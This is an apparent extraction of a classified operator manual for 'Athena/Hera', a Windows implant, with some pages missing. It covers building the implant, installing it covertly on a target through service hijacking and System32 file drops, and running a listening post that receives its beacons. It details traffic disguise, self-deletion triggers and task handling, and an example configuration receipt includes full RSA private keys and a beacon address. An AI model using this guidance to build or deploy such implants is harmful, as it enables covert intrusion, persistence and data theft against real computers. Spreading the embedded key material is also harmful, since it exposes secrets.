Athena v1 - 0 UserGuide PDF
Athena v1 - 0 UserGuide PDF
Athena v1 - 0 UserGuide PDF
Athena / Hera
Version 1.0
User Manual
29 February 2016
SECRET//NOFORN
SECRET//NOFORN
________________________________________________________________________
TABLE OF CONTENTS
ATHENA / HERA.........................................................................................................................I
VERSION 1.0.................................................................................................................................I
USER MANUAL...........................................................................................................................I
1. (U) SCOPE..................................................................................................................................1
2. (U) SYSTEM OVERVIEW.......................................................................................................1
3. (S//NF) ATHENA/HERA CONCEPT OF OPERATION (CONOP)....................................2
3.1 (U) SUMMARY OF CAPABILITIES............................................................................................3
4. (S//NF) SYSTEM VERSIONS..................................................................................................3
4.1 (S//NF) ATHENA.....................................................................................................................3
4.2 (S//NF) HERA.........................................................................................................................4
4.3 (S//NF) ATHENA/HERA VERSION COMPARISON....................................................................5
5. (U) LISTENING POST.............................................................................................................5
5.1 (U) INSTALLATION.................................................................................................................6
5.2 (U) CONFIGURATION..............................................................................................................9
5.3 (U) MANAGEMENT...............................................................................................................10
6. (U) BUILDER..........................................................................................................................11
6.1 (U) USAGE............................................................................................................................11
6.2 (U) COMMAND LINE OPTIONS.............................................................................................12
6.3 (U) WIZARD........................................................................................................................13
6.4 (U) CONFIGURATION............................................................................................................15
6.5 (U) OUTPUT..........................................................................................................................19
7. (U) IMPLANT INSTALLATION..........................................................................................23
7.1 (U) OVERT INSTALLATION ON DISK MODE.........................................................................23
7.2 (U) RANDOM ACCESS MEMORY-ONLY (RAM-ONLY) MODE.............................................23
7.3 (U) IMPLANT OFFLINE INSTALLATION................................................................................23
8. (U) TASKER............................................................................................................................25
8.1 (U) USAGE............................................................................................................................26
8.2 (U) COMMAND LINE OPTIONS.............................................................................................26
8.3 (U) USER INTERFACE...........................................................................................................28
8.4 (U) USER INTERFACE EXAMPLE..........................................................................................34
8.5 (U) OUTPUT..........................................................................................................................36
SECRET//NOFORN i
SECRET//NOFORN
________________________________________________________________________
9. (U) PARSER.............................................................................................................................36
9.1 (U) USAGE............................................................................................................................37
9.2 (U) COMMAND LINE OPTIONS.............................................................................................37
9.3 (U) PROCESSING RESPONSES AND SAFETIES........................................................................38
9.4 (U) OUTPUT..........................................................................................................................38
9.5 (S//NF) ERROR CODES........................................................................................................41
10. (U) NOTES AND OBSERVATIONS...................................................................................42
10.1 (U) INSTALLATIONS OF HERA REQUIRE A REBOOT FOR ELEVATED ACCESS PRIVILEGES 42
10.2 (U) INSTALLER AND RAM_ONLY VERSIONS SHOULD NEVER BE RUN FROM DISK.......42
10.3 (U) BUILDER DOES NOT PRODUCE A BIT COPY OF AN EXISTING CONFIGURED IMPLANT
....................................................................................................................................................42
10.4 (U) OFFLINE INSTALLER MAY REPORT A FALSE FAILURE ON WINDOWS 10
INSTALLATIONS..........................................................................................................................42
10.5 (S//NF)TIMEOUTS MAY OCCUR WHILE PROCESSING LARGE FILES..................................42
11. (U) ACRONYMS / ABBREVIATIONS...............................................................................43
LIST OF FIGURES
FIGURE 1 (S//NF) ATHENA/HERA CONCEPT OF OPERATION...................................2
FIGURE 2 - (S//NF) LISTENING POST DIRECTORY HIERARCHY.................................6
FIGURE 3 - (S//NF) UBUNTU REPOSITORY LISTING EXAMPLE...................................6
FIGURE 4 - (S//NF) OPTIONAL SSL CERTIFICATE CREATION.....................................6
FIGURE 5 - (S//NF) FAILED SETUP.PY SCRIPT OUTPUT.................................................7
FIGURE 6 - (S//NF) PIP OUTPUT FOR MANUAL BOTTLE INSTALL..............................7
FIGURE 7 - (S//NF) COMPLETING SETUP.PY SCRIPT OUTPUT.....................................8
FIGURE 8 - (S//NF) LISTENING POST CONFIGURATION FILE......................................9
FIGURE 9 - (S//NF) BUILDER COMMAND LINE OPTIONS.............................................12
FIGURE 10 - (S//NF) SYSTEM BINARY PATH.....................................................................13
FIGURE 11 - (S//NF) BUILDER WIZARD REVIEW............................................................15
FIGURE 12 - (S//NF) EXAMPLE RECEIPT FILE - XML....................................................22
FIGURE 13 - (S//NF) BUILDER OUTPUT FILES..................................................................22
FIGURE 14 - (S//NF) WINDOWS OFFLINE INSTALLER...................................................24
FIGURE 15 - (S//NF) LINUX OFFLINE INSTALLATION...................................................25
FIGURE 16 - (S//NF) TASKER COMMAND LINE OPTIONS.............................................26
SECRET//NOFORN ii
SECRET//NOFORN
________________________________________________________________________
FIGURE 17 - (S//NF) TASKER MAIN MENU........................................................................28
FIGURE 18 - (S//NF) TASKER SHELL INTERFACE EXAMPLE PART 1....................35
FIGURE 19 - (S//NF) TASKER SHELL INTERFACE EXAMPLE PART 2....................35
FIGURE 20 - (S//NF) PARSER COMMAND LINE OPTIONS.............................................37
SECRET//NOFORN iii
SECRET//NOFORN
________________________________________________________________________
LIST OF TABLES
TABLE 1 - (U) APPLICABLE DOCUMENTS..........................................................................1
TABLE 1 - (U) APPLICABLE DOCUMENTS..........................................................................1
TABLE 2 - (S//NF) ATHENA SYSTEM COMPONENTS........................................................1
TABLE 2 - (S//NF) ATHENA SYSTEM COMPONENTS........................................................1
TABLE 3 - (U) INSTALLED FILE AND REGISTRY RESOURCES.....................................3
TABLE 4 - (U) INSTALLED FILE AND REGISTRY RESOURCES.....................................4
TABLE 5 - (S//NF) DIFFERENCES BETWEEN VERSIONS.................................................5
TABLE 6 - (S//NF) SIMILARITIES BETWEEN VERSIONS.................................................5
TABLE 7 - (S//NF) STEP-BY-STEP IMPLANT CONFIGURATION INSTRUCTIONS...15
TABLE 8 - (S//NF) REQUIRED OFFLINE INSTALLER COMPONENTS........................25
TABLE 9 (U) COMMAND FILE ENCODING.....................................................................36
TABLE 10 - (U) ERROR CODES..............................................................................................41
TABLE 11 - (U) ACRONYMS AND ABBREVIATIONS.......................................................43
SECRET//NOFORN iv
SECRET//NOFORN
________________________________________________________________________
1. (U) Scope
(U) This document establishes the User Guide for Athena v1.0 and for Hera v1.0. See Section 4
for a discussion of the specific characteristics of each system.
Table 1 - (U) Applicable Documents
Description Date Version
Athena v1.0 User Requirement Document
3-Feb-2016 REV G
OPS0001051
Hera v1.0 User Requirement Document
15-Feb-2016 REV B
OPS0001743
Athena v1.0 IV&V Report TBS TBS
SECRET//NOFORN 1
SECRET//NOFORN
________________________________________________________________________
3. (S//NF) Athena/Hera Concept of Operation (CONOP)
(S//NF) The operator uses the Builder (builder.py) to tailor an implant for the specific
operational scenario. The operator then deploys the configured implant (Installer) on a target
computer.
(S//NF) Once activated, the Installer will modify the target registry and drop the host file
(IprCache.dll default) and data file (ras.cache default) in their specified locations. The
installation tool will restart the RemoteAccess service and launch the Athena Engine in the
netsvcs svchost.exe process. The installed tool will beacon to the Listening Post (LP) to receive
tasking.
(S//NF) The system also allows the Operator to configure certain behavior of the tool at runtime
during beacon events. The Tasker (tasker.py) is used to task the implant. The Parser
(parser.py) is used to decode the results retrieved from the Listening Post.
SECRET//NOFORN 2
SECRET//NOFORN
________________________________________________________________________
3.1 (U) Summary of Capabilities
(S//NF) The following is a summary of the system capabilities:
Executes on the Windows XP (SP3)/7/8.1/2008/2012/10 (x86/x64) operating systems.
Provides a beaconing capability that provides configuration and task handling
Provides memory loading/unloading of NOD Persistence Specification DLLs on the
target system
Provides delivery and retrieval of files to/from a specified directory on the target system
Allows the operator to configure settings during runtime (while the implant is on target)
4. (S//NF) System Versions
(S//NF) The system was designed to allow a base installation (Athena) and an extended
installation (Hera). Both versions contain the full command set defined in this document. This
section will describe the differences between the implementations and configurations.
SECRET//NOFORN 3
SECRET//NOFORN
________________________________________________________________________
File System Modification Location Configuration Item Description
SYSTEM\\CurrentControlSet\\services\\RemoteAccess\\ None Used by RemoteAccess Service
RouterManagers\\Ip (Windows10 Only)
GlobalInfo= <BINARY DATA>
SYSTEM\\CurrentControlSet\\services\\RemoteAccess\\ None Used by RemoteAccess Service
RouterManagers\\Ip (Windows10 Only)
ProtocolId= 0x00000021
SECRET//NOFORN 4
SECRET//NOFORN
________________________________________________________________________
4.3 (S//NF) Athena/Hera Version Comparison
Table 5 - (S//NF) Differences between Versions
Feature Athena Hera
Hash (function names) Adler hash from zlib Superfast hash
Mask(local encryption) XTEA with key increment AES with reduced key space
Packing Mask 0x3B 0x5C
String Mask 0x5D8E1792 0xAF27D2C9
Compilation MSVC 2013 LLVM 3.7.0
Module Compilation Installer.dll Installer.bravo.dll
(actual modules using alternate compilation) Host.dll Host.bravo.dll
Ram_only.dll Ram_only.bravo.dll
Persistence RemoteAccess Dnscache
Compression ZLIB BZip2
SECRET//NOFORN 5
SECRET//NOFORN
________________________________________________________________________
ROOT folder
|---- server log files
|---- Parent ID folder (e.g., TEST)
| |---- parent tasking files
| |---- Child ID folder
| | |-- inbox folder (files received from the implant)
| | |- Responses and safety files
| | |-- outbox folder (files to be sent to the implant)
| | |- tasking files
| |---- Child ID folder
|
|---- Parent ID folder
(S//NF) Validate that the current Ubuntu instance has the correct repository location. This can be
validated by viewing the source.list file.
> /etc/apt/sources.list
deb http://repo.devlan.net/ubuntu trusty main universe multiverse restricted
deb http://repo.devlan.net/ubuntu trusty-security main universe multiverse restricted
deb http://repo.devlan.net/ubuntu trusty-updates main universe multiverse restricted
deb http://repo.devlan.net/ubuntu trusty-backports main universe multiverse restricted
Figure 3 - (S//NF) Ubuntu Repository Listing Example
(S//NF) The SSL component of the install requires a valid SSL certificate. By selection NO to
the option use pre-existing SSL certificate and key, will generate a new certificate for you.
OpenSSL can also be used to generate a certificate. The follow example shows how this can be
done.
> openssl genpkey -algorithm RSA -out a.key
> openssl req -new -key a.key -out a.req -subj /CN=1.1.1.1
> openssl x509 -req -in a.req -signkey a.key -out a.cert
> sudo apt-get update
Figure 4 - (S//NF) Optional SSL Certificate Creation
(S//NF) To run the installation tool from the current Ubuntu instance, copy the Listening Post
directory from the installation disk to the Ubuntu v14.04 instance. The Ubuntu v14.04 Linux
distribution already contains Python 3.4 pre-installed. Use the provided installation script to
complete the installation.
SECRET//NOFORN 6
SECRET//NOFORN
________________________________________________________________________
> sudo python3 setup.py -install
~/Desktop/listeningpost$ sudo python3 setup.py -install
Verifying packages are installed ...
Apache is not installed. Do you want to install? (Y/N) default: Y
Installing Apache...
Mod-wsgi is not installed. Do you want to install? (Y/N) default: Y
Installing Mod-wsgi...
Python-pip is not installed. Do you want to install? (Y/N) default: Y
Installing pip3...
Python Bottle is not installed. Do you want to install? (Y/N) default: Y
Installing Bottle...
Failed installed. Try manual install.
One or more install packages did not exist or failed. Continue? (Y/N) default: N
y
Copying files to /var/www/html
SECRET//NOFORN 7
SECRET//NOFORN
________________________________________________________________________
Enter name of outbound folder: OUT
Enter URL path of tasking resources (comma separated), i.e. /blog/comments, /php/id: /
Enter URL path of web resources (comma separated), i.e. /, /web: /html
Enabling mod-wsgi
Disabling default site.
Use pre-existing SSL certificate and key? (Y/N) default: N
SECRET//NOFORN 8
SECRET//NOFORN
________________________________________________________________________
5.2 (U) Configuration
(S//NF) The Listening Post instance can be configured with a local JSON encoded text file called
config.json. The setup script will write out a configuration file, config.json, as well as copy the
corresponding required Server python files to /var/www/html. The config.json file contains the
information generated by the setup script and is read by the Server python script on start-up. The
config.json can be edited manually to add/modify/delete any user updates, if edits are made the
Apache server should be restarted to insure everything is refreshed. The config.json contains,
{
"DATA_URLS": ["/blog/comm", "/php/id", "/"],
"ROOT_DIR": "/srv/athena",
"WEB_URLS": ["/html", "/", "/web"],
"OUT_FOLDER": "OUT",
"IN_FOLDER": "IN",
"HOST" : "0.0.0.0",
"PORT" : "",
"LOG_SIZE" : "65536",
"HTTP_ERROR_CODE" : 200
}
Figure 8 - (S//NF) Listening Post Configuration File
SECRET//NOFORN 9
SECRET//NOFORN
________________________________________________________________________
Note
(U) URLs should start with a slash ("/") but should not have
an ending slash.
SECRET//NOFORN 10
SECRET//NOFORN
________________________________________________________________________
Host: (user-configured domain beacon names)
Connection: keep-alive (default)
Cache-Control: private, no-cache, no-store, max-age=0\r\n (default)
Cookie: session-id= (default parent ID and generated child ID masked with a generated key)
6. (U) Builder
(S//NF) Some general usage comments are presented below:
Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and
their use on multiple operations without modification may present a signature that could
identify the presence of Athena in a network.
The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.
SECRET//NOFORN 11
SECRET//NOFORN
________________________________________________________________________
Warning
(S//NF) Implant configuration may be completed on the low-
side; however, the operator should be aware that
cryptographic key data will be in the clear.
(S//NF) By default, the Builder will walk the operator through the process of configuring an
implant (via the wizard) that will be deployed to a target computer. Alternatively, the operator
can also input all configuration values via command line arguments in order to build an implant
with a single command.
Builder
usage: builder.py [-h] [-i SYSTEM_BINARY_PATH] [-r SYSTEM_IMPORT_XML]
[-o SYSTEM_EXPORT_PATH] [-w] [-b] [--debug]
Builder Configuration
optional arguments:
-h, --help show this help message and exit
-i SYSTEM_BINARY_PATH, --input SYSTEM_BINARY_PATH
This argument provides the location of the raw binary
data files. (NOTE: .\bin is the default path).
-r SYSTEM_IMPORT_XML, --receipt SYSTEM_IMPORT_XML
This argument defines an existing receipt filename to
be used for default values.
-o SYSTEM_EXPORT_PATH, --output SYSTEM_EXPORT_PATH
This argument provides the output directory path to
store the target files (NOTE: .\builder_output is the
default path).
-w, --wizard This argument will request information from the user
via the wizard.
-b, --bravo This argument builds the Athena BRAVO implementation.
--debug This argument allows debugging information to be
included in the output directory.
SECRET//NOFORN 12
SECRET//NOFORN
________________________________________________________________________
BIN
offline - linux offline files
functions.sh
linux.sh
reged.static
target_x64.ini
target_x86.ini
x64 - 64 bit implant components
command.axe
engine.axe
host.dll
install.dll
offline.exe
ram_only.dll
uninstall.axe
x86 - 32 bit implant components
command.axe
engine.axe
host.dll
install.dll
offline.exe
ram_only.dll
uninstall.axe
Figure 10 - (S//NF) System Binary Path
Builder
Generating client RSA key pair
Generating server RSA key pair
Athena Wizard:
This wizard will guide you through the input options for the Athena tool.
Press enter to accept default value.
SECRET//NOFORN 13
SECRET//NOFORN
________________________________________________________________________
SECRET//NOFORN 14
SECRET//NOFORN
________________________________________________________________________
new value:
[WIZARD COMPLETE]
Figure 11 - (S//NF) Builder Wizard Review
SECRET//NOFORN 15
SECRET//NOFORN
________________________________________________________________________
Action / Help Text Notes
1 Target - Parent ID (4 chars) The name used for this group of implants.
default:[RnzI]
new value: Name 4 characters in length
2 Target - Child ID (number - dword) The optional name of a specific implant known as a
default:[] child. This option allows the user to define a
new value: specific implant otherwise the system will use the
first 4 bytes of the mac address or a random
number.
SECRET//NOFORN 16
SECRET//NOFORN
________________________________________________________________________
Action / Help Text Notes
5 Beacon - Jitter as a percentage of Interval The default jitter used to randomize the beacon time
0..100 (number) based on a percentage of the interval time. (NOTE:
default:[5] 0 disables jitter)
new value:
Percentage (0..100)
6 Beacon - Boot Delay in seconds (number) The default boot delay for the implant. The amount
default:[60] of time to wait after a reboot.
new value:
Time in seconds
7 Beacon - Hibernation Delay in seconds The default hibernation delay for the implant. The
(number) amount of time to wait before the first beacon will
default:[60] be processed.
new value:
Time in seconds
8 Beacon - Tasking Delay in seconds (number) The default tasking delay for all commands
default:[60] processed.
new value:
Time in seconds
9 Beacon - Domains (LP Server DNS hostname or The default domain name (hostname or IP address)
IP Addresses separated by a comma) of the Listening Post to be used for beaconing.
default:[None]
new value: abc.com Time in seconds
10 Beacon - Port (number) The default port number used to beacon from the
default:[443] target.
new value:
Port number(0..65535)
11 Beacon - Proxy Port NOTE:0=disable (number) The default proxy port for processing beacons on
default:[0] the target.
new value:
Port number(0..65535)
12 Beacon - User Agent String (string) The default user agent string placed in the header
default:[Mozilla/5.0 (Windows NT 6.3; when processing beacons on the target.
Trident/7.0; rv:11.0)]
new value: String
13 Beacon - URL Path for LP (string) The default URL path on the server that is used for
default:[/] processing beacons on the target.
new value:
WARNING: This value MUST be in the
DATA_URLS field in the config.json file on the
LP.
String
14 Beacon - Accept Header (string) The default accept header in the packet when
default:[text/html,application/ processing beacons on the target.
xhtml+xml,application/
xml;q=0.9,*/*;q=0.8]
new value: String
15 Beacon - Accept Language Header (string) The default accept language header in the packet
default:[en-US,en;q=0.5] when processing beacons on the target.
new value:
String
SECRET//NOFORN 17
SECRET//NOFORN
________________________________________________________________________
Action / Help Text Notes
16 Beacon - Accept Encoding Header (string) The default accept encoding header in the packet
default:[application/octet-stream] when processing beacons on the target.
new value:
WARNING: Changing this value may cause
unexpected results when processing data on the
target.
String
17 Beacon - IE Proxy Address (string) The default IE Proxy Address used to proxy beacon
default:[] communication on the target.
new value:
String
18 Beacon - WPAD Proxy Address (string) The default WPAD Proxy Address used to proxy
default:[] beacon communication on the target.
new value:
String
19 Tasking - Overt State File Path (string) The default overt state file path used to store state
default:[] information during processing of commands.
new value: (NOTE: when empty no state information is
stored on target). This directory will store state
files (random file names) of current processing
information.
String full path
20 Tasking - Batch Execution Timeout in The default batch execution timeout is used to
seconds (number) cancel processing of long running batches.
default:[0]
new value: Time in seconds
21 Tasking - Command Execution Timeout in The default command execution timeout is used to
seconds (number) cancel processing of long running commands.
default:[0]
new value: Time in seconds
22 Tasking - Chunk Size - maximum number of The default chunk size of a packet sent from the
bytes in a single block (number) target to the Listening Post.
default:[0]
new value: Number in bytes
23 Tasking - Max CPU Utilization 0..100 The default maximum CPU utilization used by the
(number) system while processing commands.
default:[0]
new value: Percentage of system usage(0..100)
24 Tasking - Max Processing Data Size (number) The default maximum processing data size of the
default:[50331648] data to process on target.
new value:
Number in bytes
25 Uninstall - Date (YYYY-MM-DDTHH:MM:SS) The default time and date of the automatic self-
UTC deletion of the target executable.
default:[]
new value: Date (YYYY-MM-DDTHH:MM:SS)
26 Uninstall - Deadman Delay in seconds The default delay that the target will self-delete
(number) after not receiving a valid beacon.
default:[0]
new value: Time in seconds
27 Uninstall - Beacon failure attempts The default number of beacon failure attempts to
(number) force a self-delete of the target executable.
default:[0]
new value: Number
SECRET//NOFORN 18
SECRET//NOFORN
________________________________________________________________________
Action / Help Text Notes
28 Uninstall - Kill File Path - full file path The default kill file name that is used to force a
on target (string) self-delete when the file is present on the target
default:[] system.
new value:
File Name
29 Install - Target File Name (string) The default file path used for the host target file.
default:[%SystemRoot%\System32\
Microsoft\Crypto\RAS\ File Name
iprcache.dll]
new value:
30 Install - Data File Name (string) The default file path used for the data file on the
default:[%SystemRoot%\System32\ target system.
CodeIntegrity\ras.cache]
new value: File Name
31 Install - Restart service with Service The option to restart the service after install.
Control Manager (SCM) (no,yes) Otherwise, the tool will be installed and will not
default:[yes] start until next reboot or restart of the host service.
new value:
Yes/No
SECRET//NOFORN 19
SECRET//NOFORN
________________________________________________________________________
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
-----END RSA PRIVATE KEY-----
</PRIVATE_KEY>
</CLIENT_KEY>
<TASKING>
<COMMAND_EXECUTE_TIMEOUT>10</COMMAND_EXECUTE_TIMEOUT>
<STATE_FILE_PATH>.\STATE_FILES</STATE_FILE_PATH>
<MAX_CPU_UTILIZATION>40</MAX_CPU_UTILIZATION>
<MAX_PROCESSING_DATA_SIZE>1000000</MAX_PROCESSING_DATA_SIZE>
<MAX_CHUNK_SIZE>0</MAX_CHUNK_SIZE>
<BATCH_EXECUTION_TIMEOUT>123</BATCH_EXECUTION_TIMEOUT>
</TASKING>
<INSTALL>
<RESTART_SERVICE>1</RESTART_SERVICE>
<TARGET_FILE_NAME>%SystemRoot
%\System32\Microsoft\Crypto\RAS\iprcache.dll</TARGET_FILE_NAME>
<ORIGINAL_FILE_NAME>%SystemRoot%\System32\iprtrmgr.dll</ORIGINAL_FILE_NAME>
<DATA_FILE_NAME>%SystemRoot%\System32\codeintegrity\ras.cache</DATA_FILE_NAME>
</INSTALL>
<UNINSTALL>
<KILL_FILE_PATH></KILL_FILE_PATH>
<DEAD_MAN_DELAY>0</DEAD_MAN_DELAY>
<BEACON_FAILURES>0</BEACON_FAILURES>
<DATE_AND_TIME></DATE_AND_TIME>
</UNINSTALL>
<BEACON>
<BOOT_DELAY>0</BOOT_DELAY>
<DOMAINS>10.3.2.56</DOMAINS>
<PORT>443</PORT>
<JITTER>0</JITTER>
<USER_AGENT_STRING>Mozilla/5.0 (Windows NT 6.3; Trident/7.0;
rv:11.0)</USER_AGENT_STRING>
<ACCEPT_STRING></ACCEPT_STRING>
SECRET//NOFORN 20
SECRET//NOFORN
________________________________________________________________________
<INTERVAL>5</INTERVAL>
<TASKING_DELAY>0</TASKING_DELAY>
<PROXY_PORT>0</PROXY_PORT>
<HIBERNATION_DELAY>0</HIBERNATION_DELAY>
<ACCEPT_LANG_STRING></ACCEPT_LANG_STRING>
<IE_PROXY_ADDRESS></IE_PROXY_ADDRESS>
<URL_PATH>/octopus/</URL_PATH>
<ACCEPT_ENCODING_STRING></ACCEPT_ENCODING_STRING>
<WPAD_PROXY_ADDRESS></WPAD_PROXY_ADDRESS>
</BEACON>
<SERVER_KEY>
<PUBLIC_KEY>-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA4GUhkIiQtZTYYGiz3ieh
CyWOHz5KM5YbYrvkASsImNZrPem2jWBsHPBzimnrsziVPezxkRCZORBlMeThJgPA
/RAh1udtKL0x5zW6hrxuibtwW+NJSZpigqVut6gMqrtiCrhtYOp17wq4+xyQtZJ/
D0yl2w8umsFMSLDW35LaS0Lg0CuuvhjanUfW61npOpl1jpfeOEW25b/VYlwrgjcd
NdB48np1fBOe0MZLwuVMhVp2mv05jGjMdaBVwxdOlPt31ryZ/40KlfvucBqURhZp
yTa9VWorCFmTzBq6+7ZZv71PhxqOIm1+5jgROi8U95YnVTlop82mRj5BCmoZNX6p
212ZoG5skRHsMP66ohNK5qyW/qk4CnDxqKQprkdIN7/qKJ+rQ732WY6d3f407nW3
fv01qGb+66J2nIXmkZ2mdE8NIY6FxygfMKkqnMpcNfiILK1VSJYDY/LWTNNdYWnK
Q8gSBmV0klFx7BefANOY6luq0/7LzkcxOYz7AJDwXpCDVx0D/Eyc7X1K8EAX+jUY
iBv/bAjNjH6862DgR16yqzb802P4DzTn2oVVdpg8QOg52Sca7ZrSjpAwFg9zBq7K
U3+2xz7KvyZLxlfkNIpXFQRernuqVlpz057KqeI8KZpBNIlBYbDFAR/8TcXZxvqP
d7Xdpx51gzCsyos/LlB1Mq8CAwEAAQ==
-----END PUBLIC KEY-----
</PUBLIC_KEY>
<PRIVATE_KEY>-----BEGIN RSA PRIVATE KEY-----
MIIJKwIBAAKCAgEA4GUhkIiQtZTYYGiz3iehCyWOHz5KM5YbYrvkASsImNZrPem2
jWBsHPBzimnrsziVPezxkRCZORBlMeThJgPA/RAh1udtKL0x5zW6hrxuibtwW+NJ
SZpigqVut6gMqrtiCrhtYOp17wq4+xyQtZJ/D0yl2w8umsFMSLDW35LaS0Lg0Cuu
vhjanUfW61npOpl1jpfeOEW25b/VYlwrgjcdNdB48np1fBOe0MZLwuVMhVp2mv05
jGjMdaBVwxdOlPt31ryZ/40KlfvucBqURhZpyTa9VWorCFmTzBq6+7ZZv71PhxqO
Im1+5jgROi8U95YnVTlop82mRj5BCmoZNX6p212ZoG5skRHsMP66ohNK5qyW/qk4
CnDxqKQprkdIN7/qKJ+rQ732WY6d3f407nW3fv01qGb+66J2nIXmkZ2mdE8NIY6F
xygfMKkqnMpcNfiILK1VSJYDY/LWTNNdYWnKQ8gSBmV0klFx7BefANOY6luq0/7L
zkcxOYz7AJDwXpCDVx0D/Eyc7X1K8EAX+jUYiBv/bAjNjH6862DgR16yqzb802P4
DzTn2oVVdpg8QOg52Sca7ZrSjpAwFg9zBq7KU3+2xz7KvyZLxlfkNIpXFQRernuq
Vlpz057KqeI8KZpBNIlBYbDFAR/8TcXZxvqPd7Xdpx51gzCsyos/LlB1Mq8CAwEA
AQKCAgEAvkrlCOXXGjXMvQ1to3Kl7ob9nF89m7urI7LE63ysALitH0cISaJAbNY4
lWO3vze30FkUjnmuBqdxubsoeA1s5u58U/vUJV00aae1s7cuYlzzLulzaBile7eB
SfwYKd1YilDWaP7L3liQgFs8GM7QM5BDgp7AXfqYj3hv8A9gUby4W7D/sjPviLu4
dcO8trYW7EK776qnLPTep1gUiYvlmJJfTvoskXkuEExpSTEdEGWj+VHPMNRat1Gu
CRDF0i/i89bjHcVk+cY48RaJMVqmgT2LmFi9f4o/fTIZ6YY9XA3V2HPbnzSODfv0
GAx/UmsilfJmXw9V93GpxIQvNp9guJGD6lHjxnaRCkhuGWkMwxdZY30OYVIt2JWy
vS6RkG+VEg71Cr92GK2HVucs6WKPEaBPwpO6REh0mK4yt4qRupAm0O1P6B2q4wHi
2Dyg5lD9tPc0IklezxoQRJbBHx4q3qHcVqkUla7R3OnGSHYLkRNYVBEdrwgl2atH
CkqSZTvfeBFuTXIONnNCK02PWI3N9TPmIBG5iAxml5M0NXb3EdG+v19Cc471q6q8
